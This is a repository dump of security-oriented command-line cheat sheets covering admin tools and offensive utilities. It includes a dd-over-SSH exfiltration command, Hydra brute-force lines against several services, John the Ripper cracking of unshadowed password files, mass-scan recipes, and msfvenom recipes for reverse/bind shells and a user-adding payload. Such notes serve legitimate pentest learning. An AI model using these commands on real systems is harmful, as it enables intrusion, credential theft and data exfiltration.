├── README.md ├── adb.md ├── airflow.md ├── androguard.md ├── android.md ├── ansible.md ├── avd.md ├── awk.md ├── curl.md ├── cut.md ├── dd.md ├── debian.md ├── django.md ├── docker.md ├── dot.md ├── dpkg.md ├── elf.md ├── emulator.md ├── fail2ban.md ├── find.md ├── gcloud.md ├── git.md ├── go.md ├── gobuster.md ├── gpg.md ├── grep.md ├── hacktheplanet.md ├── http.md ├── httpie.md ├── hydra.md ├── ip.md ├── iptables.md ├── java.md ├── john.md ├── journalctl.md ├── less.md ├── lldb.md ├── luks.md ├── massscan.md ├── mongo.md ├── mount.md ├── msf.md ├── mypy.md ├── mysql.md ├── nbtscan.md ├── netcat.md ├── nmap.md ├── objdump.md ├── openssl.md ├── pdf-parser.md ├── pdf.md ├── pip.md ├── powershell.md ├── psql.md ├── python.md ├── regex.md ├── sed.md ├── snort.md ├── sqlite.md ├── ssh.md ├── strings.md ├── svn.md ├── tar.md ├── tmux.md ├── useragent.md ├── vagrant.md ├── vim.md ├── wget.md ├── wordpress.md ├── wp.md ├── wpscan.md ├── xpath.md ├── yara.md └── zeek.md /README.md: -------------------------------------------------------------------------------- 1 | # commands-for-sec 2 | Tips for command line for security 3 | -------------------------------------------------------------------------------- /adb.md: -------------------------------------------------------------------------------- 1 | # adb 2 | 3 | **Kill the server:** 4 | ``` 5 | adb kill-server 6 | ``` 7 | 8 | **Install package:** 9 | ``` 10 | adb install example.apk 11 | ``` 12 | -------------------------------------------------------------------------------- /airflow.md: -------------------------------------------------------------------------------- 1 | # Airflow 2 | 3 | **Run the web server:** 4 | ``` 5 | airflow webserver -p 8080 6 | ``` 7 | 8 | **Run the scheduler:** 9 | ``` 10 | airflow scheduler 11 | ``` 12 | 13 | **Test a task from a DAG:** 14 | ``` 15 | airflow test DAG TASK 2017-03-18T18:00:00.0 16 | ``` 17 | 18 | **List DAGs:** 19 | ``` 20 | airflow list_dags 21 | ``` 22 | 23 | **Run a DAG:** 24 | ``` 25 | airflow trigger_dag DAG 26 | ``` 27 | -------------------------------------------------------------------------------- /androguard.md: -------------------------------------------------------------------------------- 1 | # Androguard 2 | 3 | **Load an APK in a shell:** 4 | ``` 5 | androlyze.py APK 6 | ``` 7 | 8 | **See certificate:** 9 | ``` 10 | androsign.py --all --show APK 11 | ``` 12 | 13 | **Show package information:** 14 | ``` 15 | androguard apkid APK 16 | ``` 17 | 18 | **Show the manifest:** 19 | ``` 20 | androguard axml APK 21 | ``` 22 | 23 | **Decode compiled resources:** 24 | ``` 25 | androguard arsc app.apk 26 | ``` 27 | -------------------------------------------------------------------------------- /android.md: -------------------------------------------------------------------------------- 1 | # Android 2 | 3 | **See apk permissions**: 4 | ``` 5 | aapt l -a app.apk 6 | ``` 7 | 8 | **Convert Android xml to xml using androguard:** 9 | ``` 10 | androaxml -i content/AndroidManifest.xml 11 | ``` 12 | 13 | **Check certificates**: 14 | ``` 15 | keytool -printcert -file contents/META-INF/CERT.RSA 16 | ``` 17 | 18 | **Decompile with androguard :** 19 | ``` 20 | androdd.py -i FILENAME.apk -o OUTPUT_DIR 21 | ``` 22 | 23 | **Decompile with jadx**: 24 | ``` 25 | jadx -d out classes.dex 26 | ``` 27 | 28 | **Compare two APK with androguard :** 29 | ``` 30 | Androsim.py -i FILENAME_1.apk FILENAME_2.apk -c ZLIB -n 31 | ``` 32 | -------------------------------------------------------------------------------- /ansible.md: -------------------------------------------------------------------------------- 1 | # Ansible 2 | 3 | **Test connection as root** 4 | ```bash 5 | $ ansible all -m ping -u USER --ask-become-pass 6 | ``` 7 | 8 | **Run command directly** 9 | ```bash 10 | $ ansible all -s -m shell -a 'apt-get install nginx' 11 | ``` 12 | 13 | **Run playbook and ask for sudo password** 14 | ```bash 15 | $ ansible-playbook -s main.yml -K 16 | ``` 17 | 18 | **Create templates for a role:** 19 | ```bash 20 | $ ansible-galaxy init ROLENAME 21 | ``` 22 | -------------------------------------------------------------------------------- /avd.md: -------------------------------------------------------------------------------- 1 | # Android Virtual Device 2 | 3 | **List devices :** 4 | ``` 5 | emulator -list-avds 6 | ``` 7 | 8 | **Launch a device:** 9 | ``` 10 | emulator -avd foo 11 | ``` 12 | -------------------------------------------------------------------------------- /awk.md: -------------------------------------------------------------------------------- 1 | # awk 2 | 3 | **Select lines in a csv file based on text comparison** 4 | ```bash 5 | awk -F ',' '$5 ~ /baddomain.com/' FILE 6 | ``` 7 | 8 | **Print specific fields of a csv file** 9 | ```bash 10 | awf -F '|' '{print $3" "$4} FILE 11 | ``` 12 | 13 | **Tab separated files:** 14 | ``` 15 | awk -F $'\t' ... 16 | ``` 17 | -------------------------------------------------------------------------------- /curl.md: -------------------------------------------------------------------------------- 1 | # Curl 2 | 3 | **Find url of an url shortened link**: 4 | ```bash 5 | curl -w "%{redirect_url}" URL 6 | ``` 7 | **HEAD HTTP request**: 8 | ```bash 9 | curl -I -X HEAD URL 10 | ``` 11 | 12 | **Follow redirects**: 13 | ```bash 14 | curl -L URL 15 | ``` 16 | 17 | **Do not validate HTTPs certificate:** 18 | ```bash 19 | curl -k URL 20 | ``` 21 | 22 | **Change user agent**: 23 | ``` 24 | curl -A "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0; ms-office)" http://url.com 25 | ``` 26 | 27 | **POST requests** 28 | ``` 29 | curl -d "param1=value1¶m2=value2" -X POST http://localhost:3000/data 30 | ``` 31 | 32 | **POST Json request**: 33 | ``` 34 | curl -d '{"key1":"value1", "key2":"value2"}' -H "Content-Type: application/json" -X POST http://localhost:3000/data 35 | ``` 36 | 37 | **Force DNS resolution** 38 | ``` 39 | curl https://DOMAIN.TLD --resolve "DOMAIN.TLD:443:IP_ADDRESS" 40 | ``` 41 | 42 | **Test if a proxy is open:** 43 | ``` 44 | http_proxy=http://X.X.X.X:8080/ curl -4 -s http://nyc2.mirrors.digitalocean.com/tools/open_proxy_check.txt 45 | ``` 46 | 47 | **Upload file:** 48 | ```sh 49 | curl --upload-file 50 | ``` 51 | 52 | 53 | **Give parameters with encoding:** 54 | ```sh 55 | curl --data-urlencode urlConfig= 56 | ``` 57 | 58 | **Send request as logged user:** 59 | ```sh 60 | curl -u --data-binary 61 | ``` 62 | -------------------------------------------------------------------------------- /cut.md: -------------------------------------------------------------------------------- 1 | # Cut 2 | 3 | **Cut 8 first characters in a line** 4 | ```bash 5 | cut -c 8- FILE 6 | ``` 7 | 8 | **Only show the first line of a csv file** 9 | ```bash 10 | cut -d',' -f1 FILE.csv 11 | ``` 12 | -------------------------------------------------------------------------------- /dd.md: -------------------------------------------------------------------------------- 1 | # dd 2 | 3 | **Copy an image to an sd card:** 4 | ``` 5 | dd bs=4M if=2018-11-13-raspbian-stretch.img of=/dev/sdX status=progress conv=fsync 6 | ``` 7 | 8 | **Exfiltrate the contents of an image via SSH to another machine, compressing (-C) the content.** 9 | 10 | ```sh 11 | dd if=/dev/rdisk0s1s2s bs=65536 conv=noerror,sync | ssh -C user@ "cat >/tmp/image.dd" 12 | ``` 13 | -------------------------------------------------------------------------------- /debian.md: -------------------------------------------------------------------------------- 1 | # Debian 2 | 3 | * 8 : Jessie 4 | * 9 : Stretch 5 | * 10 : Buster 6 | * 11 : Bullseye - stable 7 | * 12 : bookworm - testing 8 | * Sid - unstable 9 | -------------------------------------------------------------------------------- /django.md: -------------------------------------------------------------------------------- 1 | # Django 2 | 3 | **Run a server:** 4 | ``` 5 | python manage.py runserver 6 | ``` 7 | 8 | **Create superuser:** 9 | ``` 10 | python manage.py createsuperuser 11 | ``` 12 | -------------------------------------------------------------------------------- /docker.md: -------------------------------------------------------------------------------- 1 | # Docker 2 | 3 | **List running containers :** 4 | ``` 5 | docker ps 6 | ``` 7 | 8 | **List all containers:** 9 | ``` 10 | docker ps -a 11 | ``` 12 | 13 | **Stop a container:** 14 | ``` 15 | docker kill d4 16 | ``` 17 | 18 | **Remove a container:** 19 | ``` 20 | docker rm d4 21 | ``` 22 | 23 | **List images:** 24 | ``` 25 | docker images 26 | ``` 27 | 28 | **Delete image:** 29 | ``` 30 | docker rmi d4 31 | ``` 32 | 33 | **List port forwarded for an image:** 34 | ``` 35 | docker port d4 36 | ``` 37 | 38 | **Run a container:** 39 | ``` 40 | docker run -it 41 | ``` 42 | 43 | **MySQL for dev in a container:** 44 | ``` 45 | docker run -d --name mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=root -v PATH:/var/lib/mysql mysql 46 | ``` 47 | 48 | **Mongo for dev in a container:** 49 | ``` 50 | docker run -d -p 27017:27017 -v PATH:/data/db --name mongodb mongo:latest 51 | ``` 52 | 53 | **Get IP address:** 54 | ``` 55 | docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' CONTAINER 56 | ``` 57 | -------------------------------------------------------------------------------- /dot.md: -------------------------------------------------------------------------------- 1 | # Dot 2 | 3 | **Convert dot to png:** 4 | 5 | ``` 6 | dot file.dot -Tpng -o image.png 7 | ``` 8 | -------------------------------------------------------------------------------- /dpkg.md: -------------------------------------------------------------------------------- 1 | # dpkg 2 | 3 | **List files from a package installed:** 4 | ``` 5 | dpkg-query -L libre2-3 6 | ``` 7 | 8 | **Find if a file belong to a package:** 9 | 10 | ``` 11 | dpkg -S FILE 12 | ``` 13 | -------------------------------------------------------------------------------- /elf.md: -------------------------------------------------------------------------------- 1 | # ELF 2 | 3 | **Read symbols:** 4 | ``` 5 | readelf -D FILE 6 | ``` 7 | -------------------------------------------------------------------------------- /emulator.md: -------------------------------------------------------------------------------- 1 | # Android Emulator 2 | 3 | **List devices:** 4 | ``` 5 | emulator -list-avds 6 | ``` 7 | 8 | **Launch one with hardware acceleration:** 9 | ``` 10 | emulator -avd "Pixel_2" -gpu host 11 | ``` 12 | 13 | **Launch with writable system partition:** 14 | ``` 15 | emulator -avd -writable-system 16 | ``` 17 | -------------------------------------------------------------------------------- /fail2ban.md: -------------------------------------------------------------------------------- 1 | # fail2ban 2 | 3 | **Check enabled jails:** 4 | ``` 5 | sudo fail2ban-client status 6 | ``` 7 | 8 | **Check actions on a jail:** 9 | ``` 10 | sudo fail2ban-client status apache 11 | ``` 12 | 13 | **Unban IP:** 14 | ``` 15 | sudo fail2ban-client set apache unbanip 111.111.111.111 16 | ``` 17 | -------------------------------------------------------------------------------- /find.md: -------------------------------------------------------------------------------- 1 | # Find 2 | 3 | **Delete files:** 4 | 5 | ```sh 6 | find . -iname "*.nope" -delete 7 | find . -type f -name "tecmint.txt" -exec rm -f {} \; 8 | find . -type f -name "*.txt" -exec rm -f {} \; 9 | find . -type f -name "*.mp3" -exec rm -f {} \; 10 | ``` 11 | 12 | **Find files created on a specific day:** 13 | `find . -type f -newermt 2007-06-07 ! -newermt 2007-06-08` 14 | 15 | 16 | **Find files modified in the past 5 days:** 17 | 18 | ```sh 19 | find / -mtime -5 -ctime -5 20 | ``` 21 | 22 | **Find files modified in the last minute:** 23 | 24 | ```sh 25 | find / -mmin -1 26 | ``` 27 | 28 | **Find SUID/SGID files:** 29 | 30 | ```sh 31 | find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null 32 | find / -perm /u=s 33 | find / -perm /g=s 34 | find / -perm 2644 35 | find / -perm 1551 36 | find . -type f -perm 0777 -print 37 | find / -type f ! -perm 777 38 | ``` 39 | 40 | 41 | **Find read only files:** 42 | 43 | ```sh 44 | find / -perm /u=r 45 | find / -perm /a=x 46 | ``` 47 | 48 | 49 | **Find all 777 permission files and use chmod command to set permissions to 50 | 644:** 51 | 52 | ```sh 53 | find / -type f -perm 0777 -print -exec chmod 644 {} \; 54 | ``` 55 | 56 | 57 | **Send output from the find command to a file:** 58 | 59 | ```sh 60 | find / -name *.mp3 -fprint nameoffiletoprintto 61 | ``` 62 | 63 | **Find and execute a command against a file:** 64 | 65 | ```sh 66 | # Search and edit a file at the same time 67 | find / -name filename -exec nano '{}' \; 68 | ``` 69 | 70 | 71 | **Find single files based on user:** 72 | 73 | ```sh 74 | find / -user root -name file.txt 75 | ``` 76 | 77 | **Find all files based on group:** 78 | 79 | ```sh 80 | find /home -group developer 81 | ``` 82 | 83 | **Find Particular Files of User:** 84 | 85 | ```sh 86 | find /home -user tecmint -iname "*.txt" 87 | ``` 88 | 89 | 90 | **Find Size between 50MB – 100MB:** 91 | 92 | ```sh 93 | find / -size +50M -size -100M 94 | ``` 95 | 96 | 97 | **Find all emtpy files:** 98 | 99 | ```sh 100 | find /tmp -type f -empty 101 | ``` 102 | 103 | **Find all empty directories:** 104 | 105 | ```sh 106 | find /tmp -type d -empty 107 | ``` 108 | 109 | **Find all hidden files:** 110 | 111 | ```sh 112 | find /tmp -type f -name ".*" 113 | ``` 114 | -------------------------------------------------------------------------------- /gcloud.md: -------------------------------------------------------------------------------- 1 | # Google Cloud 2 | 3 | **Set project :** 4 | ``` 5 | gcloud config set project PROJECT_ID 6 | ``` 7 | 8 | **See configuration:** 9 | ``` 10 | gcloud config list 11 | ``` 12 | 13 | **Deploy:** 14 | ``` 15 | gcloud app deploy 16 | ``` 17 | 18 | **List enabled APIs:** 19 | ``` 20 | gcloud services list 21 | ``` 22 | 23 | **Access to GoogleCloud through your account in dev:** 24 | ``` 25 | gcloud auth application-default login 26 | ``` 27 | -------------------------------------------------------------------------------- /git.md: -------------------------------------------------------------------------------- 1 | # git 2 | 3 | **Sync a fork of a repository to keep it up-to-date with the upstream repository.**: 4 | ``` 5 | git remote add upstream https://github.com/ORIGINAL_OWNER/ORIGINAL_REPOSITORY.git 6 | git fetch upstream 7 | git checkout master 8 | git merge upstream/master 9 | ``` 10 | 11 | **Selective add:** 12 | ``` 13 | git add -p 14 | ``` 15 | 16 | **Update selectively previous commit:** 17 | ``` 18 | git rebase -i HEAD~3 19 | ``` 20 | 21 | **Check logs:** 22 | ``` 23 | git log 24 | git reflog 25 | ``` 26 | 27 | **Add/remove remote repos:** 28 | ``` 29 | git remote add NAME git:// 30 | git remote remove NAME https:// 31 | ``` 32 | 33 | **Specify private key for pull/push** 34 | ``` 35 | ssh-agent bash -c 'ssh-add /somewhere/yourkey; git clone git@github.com:user/project.git' 36 | ``` 37 | -------------------------------------------------------------------------------- /go.md: -------------------------------------------------------------------------------- 1 | # Go 2 | 3 | * Add modules to requirements: `go mod tidy` 4 | -------------------------------------------------------------------------------- /gobuster.md: -------------------------------------------------------------------------------- 1 | # Gobuster 2 | 3 | **Enumerate directories**: 4 | ``` 5 | gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt 6 | ``` 7 | 8 | **DNS mode:** 9 | ``` 10 | gobuster dns -d mysite.com -t 50 -w common-names.txt 11 | ``` 12 | 13 | **Show IPs in DNS mode:** 14 | ``` 15 | gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i 16 | ``` 17 | 18 | **vhost mode:** 19 | ``` 20 | gobuster vhost -u https://mysite.com -w common-vhosts.txt 21 | ``` 22 | 23 | **dir mode update host:** 24 | ``` 25 | gobuster dir -w lists.txt -u "TARGET" -H "Host: google.com" 26 | ``` 27 | -------------------------------------------------------------------------------- /gpg.md: -------------------------------------------------------------------------------- 1 | # GPG 2 | 3 | **Send a key to a gpg server:** 4 | ``` 5 | gpg --send-key 123456 6 | ``` 7 | 8 | **Receive a key from a server:**: 9 | ``` 10 | gpg --keyserver certserver.pgp.com --recv-keys 1234556 11 | ``` 12 | 13 | **Sign a file with detached signature**: 14 | ``` 15 | gpg --output FILE.sig --detach-sign FILE 16 | ``` 17 | 18 | **Verify a signature**: 19 | ``` 20 | gpg --verify FILE.sig FILE 21 | ``` 22 | 23 | **Export a public key:** 24 | ``` 25 | gpg --export -a "User Name" > public.key 26 | ``` 27 | 28 | **Export a public key:** 29 | ``` 30 | gpg --export-secret-keys -a Username 31 | ``` 32 | 33 | **List signatures:** 34 | ``` 35 | gpg --list-sigs 36 | ``` 37 | 38 | **Sign a key:** 39 | ``` 40 | gpg --sign-key --ask-cert-level someone@example.com 41 | ``` 42 | (Then you need to send the key to the server if you want to publish it) 43 | 44 | **Import public keys from another public ring:** 45 | ``` 46 | gpg --export --keyring=~/.gnupg.old/pubring.gpg | gpg --import 47 | ``` 48 | 49 | **Encrypt a text file:** 50 | ``` 51 | gpg --encrypt --sign --armor -r person@email.com name_of_file 52 | ``` 53 | 54 | **Encrypt and sign with a specific key:** 55 | ``` 56 | gpg --encrypt --sign --armor -r TARGET -r MYEMAIL --local-user MYEMAIL FILE 57 | ``` 58 | -------------------------------------------------------------------------------- /grep.md: -------------------------------------------------------------------------------- 1 | # Grep 2 | 3 | **Search for hashtags:** 4 | ``` 5 | cat file | grep -o '#[[:alnum:]]*' 6 | ``` 7 | 8 | **Search for IPv4 addresses:** 9 | ``` 10 | $ grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" file.txt 11 | ``` 12 | 13 | **Search for an email address:** 14 | ``` 15 | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt 16 | ``` 17 | -------------------------------------------------------------------------------- /hacktheplanet.md: -------------------------------------------------------------------------------- 1 | 2 | mm mm mm 3 | ## ## ## ## 4 | ##m####m m#####m m#####m ## m##" ####### ##m####m m####m 5 | ##" ## " mmm## ##" " ##m## ## ##" ## ##mmmm## 6 | ## ## m##"""## ## ##"##m ## ## ## ##"""""" 7 | ## ## ##mmm### "##mmmm# ## "#m ##mmm ## ## "##mmmm# 8 | "" "" """" "" """"" "" """ """" "" "" """"" 9 | 10 | 11 | 12 | mmmm mm 13 | ""## ## ## 14 | ##m###m ## m#####m ##m####m m####m ####### ## 15 | ##" "## ## " mmm## ##" ## ##mmmm## ## ## 16 | ## ## ## m##"""## ## ## ##"""""" ## "" 17 | ###mm##" ##mmm ##mmm### ## ## "##mmmm# ##mmm mm 18 | ## """ """" """" "" "" "" """"" """" "" 19 | ## 20 | 21 | -------------------------------------------------------------------------------- /http.md: -------------------------------------------------------------------------------- 1 | # HTTP 2 | 3 | HTTP codes : 4 | * **200** : OK 5 | * **201**: Created 6 | * **301** : Moved Permanently 7 | * **302** : Found 8 | * **400** : Bad Request 9 | * **401** : Unauthorized 10 | * **403** : Forbidden 11 | * **404** : Not Found 12 | * **406** : Not Acceptable 13 | * **424** : Failed Dependency 14 | * **500** : Internal Error 15 | * **502** : Bad Gateway 16 | * **503** : Service Unavailable 17 | * **504** : Gateway Timeout 18 | -------------------------------------------------------------------------------- /httpie.md: -------------------------------------------------------------------------------- 1 | # httpie 2 | 3 | **HTTP query focing the IP address:** 4 | ``` 5 | http 127.0.0.1/whatever Host:www.foo.com 6 | ``` 7 | 8 | **Set HTTP headers:** 9 | ``` 10 | http example.org User-Agent:Bacon/1.0 'Cookie:valued-visitor=yes;foo=bar' \ 11 | X-Foo:Bar Referer:http://httpie.org/ 12 | ``` 13 | 14 | **Disable certificate checking:** 15 | ``` 16 | http --verify=no URL 17 | ``` 18 | -------------------------------------------------------------------------------- /hydra.md: -------------------------------------------------------------------------------- 1 | # Hydra 2 | 3 | **SSH Bruteforce:** 4 | 5 | ```sh 6 | hydra -L users.txt -P pass.txt IP ssh 7 | ``` 8 | 9 | **FTP Bruteforce:** 10 | 11 | ```sh 12 | hydra -l user -P passlist.txt ftp://192.168.0.1 13 | ``` 14 | 15 | **IMAP Bruteforce:** 16 | 17 | ``` 18 | hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN 19 | ``` 20 | 21 | **POP3 Bruteforce:** 22 | ``` 23 | hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 24 | ``` 25 | 26 | **HTTP POST form bruteforce:** 27 | ``` 28 | hydra -L users.txt -P pass.txt -s http-post-form "/users/sign_in:user[email]=^USER^&user[password]=^PASS^&user[Commit]=Log inn:Invalid Email or password. 29 | ``` 30 | 31 | **SMTP Bruteforce:** 32 | 33 | ``` 34 | hydra -P /usr/share/wordlistsnmap.lst smtp -V 35 | ``` 36 | -------------------------------------------------------------------------------- /ip.md: -------------------------------------------------------------------------------- 1 | # ip 2 | 3 | **Change Mac address:** 4 | ``` 5 | ip link set dev INTERFACE down 6 | ip link set dev INTERFACE address XX:XX:XX:XX:XX:XX 7 | ip link set dev INTERFACE up 8 | ``` 9 | -------------------------------------------------------------------------------- /iptables.md: -------------------------------------------------------------------------------- 1 | # iptables 2 | 3 | **See all rules:** 4 | ``` 5 | iptables -L 6 | ``` 7 | 8 | **List rules number:** 9 | ``` 10 | iptables -L --line-number 11 | ``` 12 | 13 | **Delete a specific rule:** 14 | ``` 15 | iptables -D INPUT 1 16 | ``` 17 | 18 | **Flush a chain:** 19 | ``` 20 | iptables -F INPUT 21 | ``` 22 | 23 | -------------------------------------------------------------------------------- /java.md: -------------------------------------------------------------------------------- 1 | # Java 2 | 3 | **Change java default version on Debian:** 4 | ```bash 5 | sudo update-alternatives --config java 6 | ``` 7 | -------------------------------------------------------------------------------- /john.md: -------------------------------------------------------------------------------- 1 | # JohnTheRipper 2 | 3 | 4 | ```sh 5 | john --wordlist=dict.txt passwd 6 | john --show passwd 7 | john --restore 8 | unshadow passwd shadow > unshadowed.txt 9 | john --wordlist=dict.txt unshadowed.txt 10 | ``` 11 | -------------------------------------------------------------------------------- /journalctl.md: -------------------------------------------------------------------------------- 1 | # journalctl 2 | 3 | **Check for a specific unit:** 4 | ``` 5 | journalctl -u nginx.service 6 | ``` 7 | 8 | **Limit in time:** 9 | ``` 10 | journalctl --since 09:00 --until "1 hour ago" 11 | journalctl -u nginx.service --since today 12 | ``` 13 | -------------------------------------------------------------------------------- /less.md: -------------------------------------------------------------------------------- 1 | # less 2 | 3 | **Show binary file (and not less interpretation)** 4 | ``` 5 | less -L file 6 | ``` 7 | -------------------------------------------------------------------------------- /lldb.md: -------------------------------------------------------------------------------- 1 | # lldb 2 | 3 | * Launch process: `process launch --stop-at-entry` 4 | * Disassemble at a specific address: `d -s 0x100001080` 5 | * Set breakpoint at an address: `br s -a 0x10000` 6 | * Print data: (b for byte, w for word, c for char, x for hex, s for string): `x/40bx $rdx` 7 | * Step in: `step` or `s` 8 | * Step over: `next` or `n` 9 | * Print variable value: `p $r12` 10 | * Print all registries values: `re r -f i` 11 | * List binary and libraries loaded : `image list` 12 | * List sections : `image dump sections` 13 | 14 | -------------------------------------------------------------------------------- /luks.md: -------------------------------------------------------------------------------- 1 | # LUKS 2 | 3 | **Open encrypted device** : 4 | ``` 5 | cryptsetup --type luks open /dev/sdb1 encrypted 6 | ``` 7 | 8 | **Close encrypted drive:** 9 | ``` 10 | cryptsetup close encrypted 11 | ``` 12 | 13 | **Format drive:** 14 | ``` 15 | cryptsetup luksFormat -c aes-xts-plain64 --key-size 512 --hash sha512 --use-urandom /dev/sdb1 16 | ``` 17 | -------------------------------------------------------------------------------- /massscan.md: -------------------------------------------------------------------------------- 1 | # Massscan 2 | 3 | **Target Specification** 4 | ``` 5 | # Target specification 6 | masscan 10.0.0.1 7 | masscan 10.0.0.0/24 192.168.1.0/24 8 | 9 | # Exclude IP file 10 | masscan 10.0.0.1/24 --excludeFile 11 | 12 | # Exclude a single IP from the scan 13 | masscan 180.215.0.0/16 --exclude=180.215.122.120 14 | ``` 15 | 16 | **Port Specification** 17 | ``` 18 | # Port specification 19 | masscan 10.0.0.0.1 -p 80 20 | masscan 10.0.0.0.1 -p 0-65535 21 | masscan 10.0.0.0.1 -p 80,443 22 | 23 | # UDP Scan 24 | masscan 10.0.0.0.1 -pU 53 25 | ``` 26 | 27 | **Timing and Performance** 28 | ``` 29 | # Used to scan in offline mode 30 | # It does not send any traffic but just estimate the time length 31 | masscan 0.0.0.0/24 --offline 32 | 33 | # Using the rate to send X packets per second 34 | masscan 10.0.0.1/24 --rate 10000 35 | 36 | 37 | # Get banners from services (only few protocols supported) 38 | # Problem is that masscan uses his own TCP/IP stack so when the local system 39 | # received a SYN-ACK from the probed target, it responds with a TST packet that 40 | # kills the connection before the banner information can be grabbed. 41 | # You can use --source-ip to assign another IP to prevent 42 | masscan 10.0.0.1 --banners 43 | 44 | # Assign masscan to another IP 45 | masscan 10.0.0.1 --source-ip 192.168.1.200 46 | 47 | # Include a ping 48 | masscan 10.0.0.1 --ping 49 | 50 | # Change the default user agent 51 | masscan 10.0.0.1 --http-user-agent 52 | 53 | # Report only open ports 54 | masscan 10.0.0.1 --open-only 55 | 56 | # Save sent packet in PCAP 57 | masscan 10.0.0.1 --pcap 58 | 59 | # Print packets in terminal (ok in low rate but RIP terminal with high rates) 60 | masscan 10.0.0.1 --packet-trace 61 | ``` 62 | 63 | **Output** 64 | ``` 65 | # Quick port identification 66 | # - Subnet target 67 | # - Port range 68 | # - High speed 69 | masscan 10.1.1.1/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \ 70 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 71 | -oL "output.txt" 72 | 73 | # Multiple targets specific scan 74 | # - Known ports 75 | # - Fast rate 100.000 76 | # - Banner grabbing and another source IP 77 | # - Only open ports 78 | # - Modified user-agent 79 | masscan -p 80,433 --rate 100000 --banners --open-only\ 80 | --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 81 | --source-ip 192.168.100.200 -oL "output.txt" 82 | 83 | # TOP 20 ports scanning 84 | # Modified user-agent 85 | # Medium speed 86 | masscan -p 21,22,23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080\ 87 | --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"\ 88 | --rate 100000 --oL "output.txt" 89 | 90 | # In some cases, masscan can be better than nmap 91 | # For example, when searching for a big range on some ports only 92 | # (Internal pentest for example) you can do multiple iterations of scans 93 | # XML output are interesting for db_import in metasploit 94 | sudo masscan -p 22 --rate 2000 -oX output_port_22.xml 95 | ``` 96 | -------------------------------------------------------------------------------- /mongo.md: -------------------------------------------------------------------------------- 1 | # mongo 2 | 3 | **Connect to remote DB:** 4 | ``` 5 | mongo -u -p 6 | ``` 7 | 8 | **List databases:** 9 | ``` 10 | show dbs 11 | ``` 12 | 13 | **List collections**: 14 | ``` 15 | show collections 16 | ``` 17 | 18 | **Use a database:** 19 | ``` 20 | use DBNAME 21 | ``` 22 | 23 | **Show content of the collection cars**: 24 | ``` 25 | db.cars.find() 26 | ``` 27 | 28 | **Drop the collection houses** 29 | ``` 30 | db.houses.drop() 31 | ``` 32 | 33 | **Dump database:** 34 | ``` 35 | mongodump -d -o 36 | ``` 37 | 38 | **Restore dump:** 39 | ``` 40 | mongorestore -d 41 | ``` 42 | 43 | **Run query in mongo legacy shell:** 44 | ``` 45 | mongo DBNAME --eval "QUERY" 46 | ``` 47 | -------------------------------------------------------------------------------- /mount.md: -------------------------------------------------------------------------------- 1 | # Mount 2 | 3 | **Mount CIFS (you need cifs-utils):** 4 | ```bash 5 | mount -t cifs -o username=robert,password=foobar123 //192.168.1.11/videos /mnt/vids 6 | ``` 7 | 8 | **Mount Windows drive image for forensic analysis** 9 | ```bash 10 | mount -o ro,loop,shows_sys_files,streams_interface=windows img.dd /mnt 11 | ``` 12 | 13 | **Mount a specific partition of a Windows drive image:** 14 | ```bash 15 | mount -o ro,loop,shows_sys_files,streams_interface=windows,offset=32256 img.dd /mnt 16 | ``` 17 | -------------------------------------------------------------------------------- /msf.md: -------------------------------------------------------------------------------- 1 | # Metasploit 2 | 3 | ## MSFVenom shells: 4 | 5 | ### Linux 6 | 7 | Linux Meterpreter reverse shell x86 multi stage: 8 | 9 | ```sh 10 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 11 | ``` 12 | 13 | Linux Meterpreter bind shell x86 multi stage: 14 | 15 | ```sh 16 | msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= LPORT= -f elf > shell.elf 17 | ``` 18 | 19 | Linux bind shell x64 single stage: 20 | 21 | ```sh 22 | msfvenom -p linux/x64/shell_bind_tcp RHOST= LPORT= -f elf > shell.elf 23 | ``` 24 | 25 | Linux reverse shell x64 single stage: 26 | 27 | ```sh 28 | msfvenom -p linux/x64/shell_reverse_tcp RHOST= LPORT= -f elf > shell.elf 29 | ``` 30 | 31 | ### Windows 32 | 33 | Windows Meterpreter http reverse shell: 34 | 35 | ```sh 36 | msfvenom -p windows/meterpreter_reverse_http LHOST= LPORT= HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe 37 | ``` 38 | 39 | Windows Meterpreter bind shell: 40 | 41 | ```sh 42 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > shell.exe 43 | ``` 44 | 45 | Windows CMD Multi Stage: 46 | 47 | ```sh 48 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell.exe 49 | ``` 50 | 51 | Windows CMD Single Stage: 52 | 53 | ```sh 54 | msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 55 | ``` 56 | 57 | Windows add user: 58 | 59 | ```sh 60 | msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 61 | ``` 62 | 63 | Windows shell which doesn't break the application for a x86 architecture: 64 | 65 | ```sh 66 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -f exe -a x86 --platform windows -o sploit.exe 67 | ``` 68 | 69 | 70 